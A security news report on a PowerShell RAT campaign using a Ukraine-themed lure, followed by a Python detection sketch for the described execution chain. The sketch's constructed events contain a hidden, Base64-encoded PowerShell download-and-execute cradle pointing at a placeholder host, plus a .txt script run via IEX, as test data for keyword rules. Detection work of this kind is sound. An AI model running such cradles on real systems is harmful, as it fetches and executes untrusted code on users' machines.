Ukraine supporters in Germany targeted with PowerShell RAT malware (Security News, May 2022)
An unknown threat actor is targeting German users interested in the Ukraine crisis, infecting them with a custom PowerShell RAT and stealing their data.
The lure sites used in the campaign offer malicious documents that install a custom RAT supporting remote command execution and file operations.
Visitors to the site find a file called "2022-Q2-Bedrohungslage-Ukraine" (roughly "2022 Q2 threat situation Ukraine"), promising information about the situation in Ukraine and offered for free download. The corresponding section of the site claims the document is constantly updated with new information, so users are urged to fetch a fresh copy every day.
In the background, the file launches PowerShell, which runs a Base64 deobfuscator; the decoded stage then fetches and executes a malicious script from the fake site.
The script is delivered as a .txt file together with a .cmd file that launches it through PowerShell.
PowerShell RAT. The custom PowerShell RAT hidden in "Status.txt" begins its malicious operation by collecting basic system information and assigning the host a unique client ID. This information, and anything else stolen from the host computer, is exfiltrated to a German domain, "Kleinm[.]de".
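The execution chain described above (Base64-obfuscated PowerShell stage, a download-and-execute cradle, and a .cmd launcher feeding a .txt script body into PowerShell) leaves characteristic traces in process-creation telemetry. The following detection sketch is an added example written for this page, not code from the report or from the threat actor; it runs three rules over constructed Sysmon/4688-style events. The sample command lines, file paths, the `lure.example.invalid` URL and the Office parent process are assumptions for illustration, not indicators taken from the campaign.

```python
"""Detection sketch for the tradecraft described above: an obfuscated PowerShell
stage that fetches and runs a script from a web server, and a .cmd launcher that
feeds a .txt payload into PowerShell.  Added example, not code from the report.
All events below are constructed; the URL, paths and parent processes are
assumptions, not indicators from the campaign."""
import base64
import re
from dataclasses import dataclass

# Download-cradle and in-memory-execution keywords common in PowerShell stagers.
CRADLE_PATTERNS = [
    r"invoke-expression", r"\biex\b", r"downloadstring", r"downloadfile",
    r"invoke-webrequest", r"\biwr\b", r"net\.webclient", r"frombase64string",
]
# Office hosts that should rarely spawn PowerShell directly.
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
# A script body read from a .txt file and handed to the interpreter.
TXT_SOURCE = r"(get-content|\bgc\b|\btype\b|\bcat\b)[^|;]*\.txt\b"
# -EncodedCommand and the abbreviated prefixes PowerShell accepts for it.
ENCODED_ARG = r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)"


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon EID 1 / Security 4688 style)."""
    image: str
    parent_image: str
    command_line: str


@dataclass
class Finding:
    rule: str
    detail: str


def decode_encoded_command(cmdline):
    """Return the text behind -EncodedCommand, or None if absent or malformed.
    PowerShell Base64-wraps UTF-16LE, so a UTF-8 decode would look like junk."""
    m = re.search(ENCODED_ARG, cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(ev):
    """Apply every rule to one event and return the findings it produced."""
    findings = []
    if not ev.image.lower().endswith("powershell.exe"):
        return findings
    decoded = decode_encoded_command(ev.command_line)
    if decoded is not None:
        findings.append(Finding("encoded_command", decoded))
    # The remaining rules inspect the decoded stage when there is one.
    text = (decoded or ev.command_line).lower()
    has_cradle = any(re.search(p, text) for p in CRADLE_PATTERNS)
    if has_cradle and re.search(r"https?://", text):
        findings.append(Finding("download_cradle", "fetches and executes a remote script"))
    if has_cradle and re.search(TXT_SOURCE, text):
        findings.append(Finding("txt_payload_executed",
                                f"script body read from .txt, parent {ev.parent_image}"))
    if ev.parent_image.lower().endswith(OFFICE_PARENTS):
        findings.append(Finding("office_parent", ev.parent_image))
    return findings


def scan(events):
    """Run the rules over a batch of events; one findings list per event."""
    return [analyze(ev) for ev in events]


# --- constructed sample telemetry (assumption: not real campaign data) ---
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STAGE_1 = "IEX (New-Object Net.WebClient).DownloadString('http://lure.example.invalid/Status.txt')"
ENCODED_STAGE_1 = base64.b64encode(STAGE_1.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    # Document host launching hidden, encoded PowerShell (first stage).
    ProcEvent(PS, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              f"powershell.exe -NoP -W Hidden -enc {ENCODED_STAGE_1}"),
    # .cmd launcher feeding the dropped .txt into the interpreter (second stage).
    ProcEvent(PS, r"C:\Windows\System32\cmd.exe",
              r'powershell.exe -NoP -Command "IEX (Get-Content C:\Users\Public\Status.txt -Raw)"'),
    # Routine administration: must stay quiet.
    ProcEvent(PS, r"C:\Windows\explorer.exe",
              "powershell.exe -NoProfile -Command Get-Service -Name Spooler"),
]

if __name__ == "__main__":
    for i, findings in enumerate(scan(SAMPLE_EVENTS)):
        print(f"event {i}: " + (", ".join(f.rule for f in findings) or "clean"))
```

Decoding the `-EncodedCommand` argument before matching matters: the cradle keywords never appear in the raw command line of the first stage, so a rule that only greps `powershell.exe` command lines for `DownloadString` misses exactly the obfuscated launch the article describes. The `.txt` rule catches the second stage even though no network indicator is present, because a script body being sourced from a non-`.ps1` file and piped into `IEX` is itself the anomaly.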